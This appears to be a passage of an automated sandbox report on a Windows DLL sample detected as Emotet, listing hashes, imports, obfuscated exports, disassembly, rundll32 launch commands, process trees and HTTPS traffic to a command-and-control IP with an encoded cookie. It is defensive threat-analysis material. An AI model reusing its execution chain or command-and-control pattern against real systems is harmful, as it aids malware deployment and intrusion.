                        Preview: regf[...[...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..O.X................................................................................................................................................................................................................................................................................................................................................ZK.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):16384
                        Entropy (8bit):3.3965968422991564
                        Encrypted:false
                        SSDEEP:192:XF8Y71DXqxajVY9V5FSEsWftx1xVxgoJ4XyVaJNSdkyFn6yvRrsfEWfYjdsiDoX5:1jG5Rftx1TPJ4X47FFn7bZd1DoXzCa
                        MD5:5C550C70E4ED4E7E716488E6848031D4
                        SHA1:52D5CC4A6437C4B59D07743F140150B884019537
                        SHA-256:A33739BC0572CD6C528F843972424444CDDF7FB75064ED17C12B07843B1A6C74
                        SHA-512:3DF58BE4EDADA3442BD0042A0408B894F83D689AEF2EC434E7A58E19277DAD8D269B70FC5A0CFBDB3A78B9A418CD2E6600E890B08F2D8B802CF1720D1B04CF47
                        Malicious:false
                        Preview: regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..O.X................................................................................................................................................................................................................................................................................................................................................ZK.HvLE.>......Z.............l3l.lRt6.Y. gh.........0..............hbin................p.\..,..........nk,..pQ.X................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..pQ.X....... ........................... .......Z.......................Root........lf......Root....nk ..pQ.X....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

                        Static File Info

                        General

                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.0673433889863775
                        TrID:
                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                        • Generic Win/DOS Executable (2004/3) 0.20%
                        • DOS Executable Generic (2002/1) 0.20%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:efELSMI5R4.dll
                        File size:372736
                        MD5:1ec5996508211a8d174a1a09d6289463
                        SHA1:ede146abf146c0dfdb88431dfecf5cc80b267335
                        SHA256:2933137a5e251f44b2e6d2cc919c8a679651a76b900b3b9e2b06edc73b64e5e6
                        SHA512:796194f3fa1b90a732fd2e567f6b3acd2443282e5c3c1d69db3f619b2285f5526e2059ac5ecfb47467cdec1539e3a0d936d83679677e67b87ee7573406f720bd
                        SSDEEP:6144:qRsMh9YQWtcgA70wgF7nJye6CQK+kIVDRjudJMrt32fFcRmXIeJXjWMmAD:cvm9Y0HFLTRQKqV4epRmxAvAD
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0...Q...Q...Q..E#...Q..E#...Q..E#...Q../$...Q...$...Q...$...Q...$...Q..E#...Q...Q...Q...Q...Q../$...Q../$...Q..Rich.Q.........

                        File Icon

                        Icon Hash:74f0e4ecccdce0e4

                        Static PE Info

                        General

                        Entrypoint:0x1001a401
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x10000000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x61A7100E [Wed Dec 1 06:02:54 2021 UTC]
                        TLS Callbacks:0x1000c500
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:609402ef170a35cc0e660d7d95ac10ce

                        Entrypoint Preview

                        Instruction
                        push ebp
                        mov ebp, esp
                        cmp dword ptr [ebp+0Ch], 01h
                        jne 00007FD9248E77F7h
                        call 00007FD9248E7B88h
                        push dword ptr [ebp+10h]
                        push dword ptr [ebp+0Ch]
                        push dword ptr [ebp+08h]
                        call 00007FD9248E76A3h
                        add esp, 0Ch
                        pop ebp
                        retn 000Ch
                        push ebp
                        mov ebp, esp
                        push dword ptr [ebp+08h]
                        call 00007FD9248E809Eh
                        pop ecx
                        pop ebp
                        ret
                        push ebp
                        mov ebp, esp
                        jmp 00007FD9248E77FFh
                        push dword ptr [ebp+08h]
                        call 00007FD9248EBB84h
                        pop ecx
                        test eax, eax
                        je 00007FD9248E7801h
                        push dword ptr [ebp+08h]
                        call 00007FD9248EBC00h
                        pop ecx
                        test eax, eax
                        je 00007FD9248E77D8h
                        pop ebp
                        ret
                        cmp dword ptr [ebp+08h], FFFFFFFFh
                        je 00007FD9248E8163h
                        jmp 00007FD9248E8140h
                        push ebp
                        mov ebp, esp
                        push 00000000h
                        call dword ptr [1002808Ch]
                        push dword ptr [ebp+08h]
                        call dword ptr [10028088h]
                        push C0000409h
                        call dword ptr [10028040h]
                        push eax
                        call dword ptr [10028090h]
                        pop ebp
                        ret
                        push ebp
                        mov ebp, esp
                        sub esp, 00000324h
                        push 00000017h
                        call dword ptr [10028094h]
                        test eax, eax
                        je 00007FD9248E77F7h
                        push 00000002h
                        pop ecx
                        int 29h
                        mov dword ptr [1005AF18h], eax
                        mov dword ptr [1005AF14h], ecx
                        mov dword ptr [1005AF10h], edx
                        mov dword ptr [1005AF0Ch], ebx
                        mov dword ptr [1005AF08h], esi
                        mov dword ptr [1005AF04h], edi
                        mov word ptr [eax], es

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x583900x8ac.rdata
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x58c3c0x3c.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x5d0000x1bb0.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x56fdc0x54.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x571000x18.rdata
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x570300x40.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x280000x154.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x264f40x26600False0.546620521173data6.29652715831IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata0x280000x313fa0x31400False0.822468868972data7.4322686519IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x5a0000x18440xe00False0.270647321429data2.60881097454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .pdata0x5c0000x66c0x800False0.3583984375data2.21689595795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .reloc0x5d0000x1bb00x1c00False0.784598214286data6.62358237634IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Imports

                        DLLImport
                        KERNEL32.dllHeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetModuleHandleA, GetProcAddress, TlsGetValue, TlsSetValue, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, SetLastError, GetEnvironmentVariableW, GetLastError, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, CloseHandle, GetStdHandle, GetConsoleMode, WriteFile, WriteConsoleW, TlsAlloc, GetCommandLineW, CreateFileA, GetTickCount64, CreateFileW, SetFilePointerEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RaiseException, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetFileType, GetStringTypeW, HeapSize, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, DecodePointer
                        USER32.dllGetDC, ReleaseDC, GetWindowRect

                        Exports

                        NameOrdinalAddress
                        Control_RunDLL10x100010a0
                        ajkaibu20x100016c0
                        akyncbgollmj30x10001480
                        alrcidxljxybdggs40x10001860
                        bgmotrriehds50x10001820
                        bojkfvynhhupnooyb60x100019f0
                        bujuoqldqlzaod70x10001800
                        bunsahctogxzts80x100019e0
                        cjogbtafwukesw90x10001830
                        csbbcaopuok100x100016a0
                        cyqrjpaeorjur110x100015f0
                        dlrzuyaeqj120x10001840
                        egiimrq130x10001850
                        evhgyts140x100014f0
                        fdqpjjjyuw150x100017e0
                        finabzjyxhxnnuuv160x10001510
                        fkeacqpbbfw170x10001910
                        fuwsgzf180x10001790
                        fzbmpailk190x10001980
                        gamsrhauvgl200x10001810
                        gjfqgtgk210x10001a10
                        gwsmfxfmekkyr220x100018b0
                        haymuvtatadeydqmk230x10001530
                        hqruohhkvpdalhq240x10001620
                        htdaydfvtjlujwcaj250x10001660
                        hzyrvjtx260x100017c0
                        ifnsupqhxkwj270x10001870
                        ijhgowlpmypocg280x10001720
                        ispjhrqaxnyflnn290x100015a0
                        iszvcqv300x100017a0
                        ixgucop310x100018d0
                        jcdvrhrguqtjpkc320x100016b0
                        jkfyadsdpoks330x100019c0
                        kfzgxmljkwaqy340x10001730
                        kzfvroxozxufciczm350x10001740
                        lpstjqa360x10001900
                        ltkoyvzovzkqemyw370x10001630
                        mdigcwjymnzvgaql380x100014d0
                        mefathlzguuhqodfx390x10001950
                        mgsrmfbja400x10001500
                        mrxhcceopg410x100014a0
                        nafhmuoq420x100018f0
                        nefxgpc430x100018a0
                        nrehxpiznrppeu440x10001690
                        nucocnvjyqp450x100018e0
                        obxoxtcbntaxofr460x10001890
                        ofrzojd470x100016e0
                        oofbctfc480x10001550
                        opzpazspbecyjojf490x100015b0
                        oqoigff500x10001a00
                        oujlzhzvhjh510x100016f0
                        ovpsanbypajv520x100015e0
                        pblpcaadqbdxyb530x10001680
                        ragwdgnyohftj540x100017d0
                        rfosmac550x10001710
                        rgymbuetvifqjqdlo560x10001930
                        rmoxbxbbgidnbds570x10001970
                        rxnkmfbycdcc580x10001560
                        sefltbc590x10001880
                        sgieprcsphl600x100019a0
                        shpcmnqzvyltgdt610x100016d0
                        slktbekupvmdbt620x100015c0
                        sormivnk630x10001570
                        tdblkstlyin640x10001600
                        tkllyrc650x10001650
                        tkwpnvfqnbpbdqe660x10001a20
                        tnhtgnjrabqakgeke670x10001700
                        tzpmcwwig680x10001520
                        uceklmggjof690x10001610
                        ukwdddyj700x10001640
                        uwnaptydgur710x10001940
                        vjusqoeo720x10001580
                        vnyufpq730x10001590
                        vsrwmkhzkrtlexxb740x100014e0
                        wermsdfzb750x10001770
                        wkhpfdjkypy760x100014c0
                        wksndtayhfm770x100015d0
                        wnjvxspilxpchq780x10001670
                        wuqwfssiddrcl790x10001570
                        wyyhtqptznbrknitg800x100017f0
                        wzkcijdvadq810x10001540
                        wzxlvxuyy820x100019b0
                        xhtxeilfgsghxik830x10001780
                        xvdijhconoukll840x100014b0
                        ybbwnezvxfafm850x10001750
                        yeylpreasnzamgac860x100019d0
                        ypkidshxgzkkehc870x100018c0
                        ypzvmpfbgai880x10001760
                        zbrzizodycg890x10001990
                        zdiuqcnzg900x10001920
                        zfkwwtxd910x10001490
                        zktykfwmaehxg920x10001600
                        zmkbqvofdhermov930x10001960
                        zvtqmkitgmzgo940x100017b0

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Dec 2, 2021 00:47:01.562006950 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:01.562064886 CET4434981545.63.5.129192.168.2.3
                        Dec 2, 2021 00:47:01.562290907 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:01.589068890 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:01.589097977 CET4434981545.63.5.129192.168.2.3
                        Dec 2, 2021 00:47:01.925051928 CET4434981545.63.5.129192.168.2.3
                        Dec 2, 2021 00:47:01.925203085 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:03.035310984 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:03.035355091 CET4434981545.63.5.129192.168.2.3
                        Dec 2, 2021 00:47:03.035959005 CET4434981545.63.5.129192.168.2.3
                        Dec 2, 2021 00:47:03.036048889 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:03.038997889 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:03.080895901 CET4434981545.63.5.129192.168.2.3
                        Dec 2, 2021 00:47:03.570858955 CET4434981545.63.5.129192.168.2.3
                        Dec 2, 2021 00:47:03.570955038 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:03.570976973 CET4434981545.63.5.129192.168.2.3
                        Dec 2, 2021 00:47:03.571068048 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:03.572988033 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:03.573019028 CET4434981545.63.5.129192.168.2.3

                        HTTP Request Dependency Graph

                        • 45.63.5.129

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.34981545.63.5.129443C:\Windows\SysWOW64\rundll32.exe
                        TimestampkBytes transferredDirectionData
                        2021-12-01 23:47:03 UTC0OUTGET /fWxVMEvEItuVfHPcFsGHwLkZfscDpKaAeHKyPiJIqQ HTTP/1.1
                        Cookie: BPnBmsPHiG=8D4dsLTWN8wEGAED/TDSscJN6tz6UiW9Sa7p1L1j+sV8peUY3i4h541A7FXE4tOLJPvGODcUqyKdZRdd4eLVMSqHn/QSuYDzDawRyYOBXu6fQpi7mDqtISdNgCJdqllab7kmTC8JkExQ5QdDNiC5RaFQkQmH8lhmwU8xXoXh+j8s7+Z3BdjBH7uOOgjnzk8PadPgkEn5XuuSWvqAvHt+OIGRsSH4rQBUpgvQ1fCY/yKMeukT8WwcUdr5/JoJiNMk/ZsMMpoKYsGTM1YS3andCGr7w3voV5dtu6EWrfS2xnLTBepk11l/Ck/dvR9iQCeMbJwbV/hbshMw7htS0Fv4102otz0kFPNoh61rQXO2VxiWNrBF0xk=
                        Host: 45.63.5.129
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        2021-12-01 23:47:03 UTC0INHTTP/1.1 200 OK
                        Server: nginx
                        Date: Wed, 01 Dec 2021 23:47:03 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        2021-12-01 23:47:03 UTC0INData Raw: 31 35 30 0d 0a f5 5b a4 bb d6 07 ae f7 9c f1 7e 12 9a 41 38 52 b8 c8 52 77 eb d9 60 23 59 bc 11 bc d3 f3 e9 69 7d 5a ca 61 9e 18 c8 0d 6e cd 6e 1f 13 65 a7 9e 4e 34 40 27 81 92 ea 88 79 1b cc 1d 9f d2 d7 dc e3 c0 d0 39 98 69 38 79 dc f6 5f 8b 02 5d f4 be 6c a7 cc 80 d2 25 95 7a 0f c9 42 7b 4b 70 53 da c3 4c 7d 00 e8 ec 7e ca 8e f3 05 c0 16 cb 99 84 e6 21 fc 02 bc be d0 1c 5b 87 c5 e1 de 8f 96 51 7d 0e f0 da 1f 98 19 d1 24 88 79 9c 95 35 25 50 9e f9 97 87 f3 70 40 ec a4 96 68 01 92 e7 ef c8 b0 0b 7d 5f 1d bf 2d be 69 6b 46 99 27 60 32 12 4f 12 91 74 b2 67 2a 99 11 97 c6 bb df bc 6c bc 3f 34 57 a7 95 28 2b ac f0 5f e7 20 bf 78 e3 5e bf 8d e9 1f 7d 39 30 f2 cd 59 71 7b a9 a0 80 41 ac af ed 77 aa 95 a5 e3 0b 65 81 95 ae 09 91 52 bd 2c 7d ac f5 31 0a a3 a0 6a
                        Data Ascii: 150[~A8RRw`#Yi}ZanneN4@'y9i8y_]l%zB{KpSL}~![Q}$y5%Pp@h}_-ikF'`2Otg*l?4W(+_ x^}90Yq{AweR,}1j


                        Code Manipulations

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        Analysis Process: svchost.exe PID: 5048 Parent PID: 572

                        General

                        Start time:00:43:10
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: svchost.exe PID: 6416 Parent PID: 572

                        General

                        Start time:00:43:10
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: loaddll32.exe PID: 6404 Parent PID: 2948

                        General

                        Start time:00:43:11
                        Start date:02/12/2021
                        Path:C:\Windows\System32\loaddll32.exe
                        Wow64 process (32bit):true
                        Commandline:loaddll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll"
                        Imagebase:0x350000
                        File size:893440 bytes
                        MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.600312961.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.600312961.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.577604622.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.577604622.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.599173428.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.599173428.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.599105151.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.599105151.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.575882015.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.575882015.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.600444475.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.600444475.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.568041715.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.568041715.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.566098694.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.566098694.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: svchost.exe PID: 6444 Parent PID: 572

                        General

                        Start time:00:43:11
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 2064 Parent PID: 6404

                        General

                        Start time:00:43:11
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                        Imagebase:0xd80000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 6316 Parent PID: 6404

                        General

                        Start time:00:43:11
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,Control_RunDLL
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000003.522035243.0000000000785000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000003.522035243.0000000000785000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.534275093.0000000000860000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.534275093.0000000000860000.00000040.00000010.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 6276 Parent PID: 2064

                        General

                        Start time:00:43:11
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.562932146.0000000000770000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.562932146.0000000000770000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.563477731.000000000091A000.00000004.00000020.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 3176 Parent PID: 6404

                        General

                        Start time:00:43:16
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,ajkaibu
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.574084916.0000000000C7A000.00000004.00000020.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 6044 Parent PID: 6404

                        General

                        Start time:00:43:23
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,akyncbgollmj
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.562952810.0000000000DFA000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.562904188.0000000000C50000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.562904188.0000000000C50000.00000040.00000010.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: MpCmdRun.exe PID: 6740 Parent PID: 5048

                        General

                        Start time:00:44:11
                        Start date:02/12/2021
                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                        Imagebase:0x7ff6ee0f0000
                        File size:455656 bytes
                        MD5 hash:A267555174BFA53844371226F482B86B
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: conhost.exe PID: 6736 Parent PID: 6740

                        General

                        Start time:00:44:11
                        Start date:02/12/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7f20f0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 6448 Parent PID: 6276

                        General

                        Start time:00:45:01
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 4244 Parent PID: 6316

                        General

                        Start time:00:45:02
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
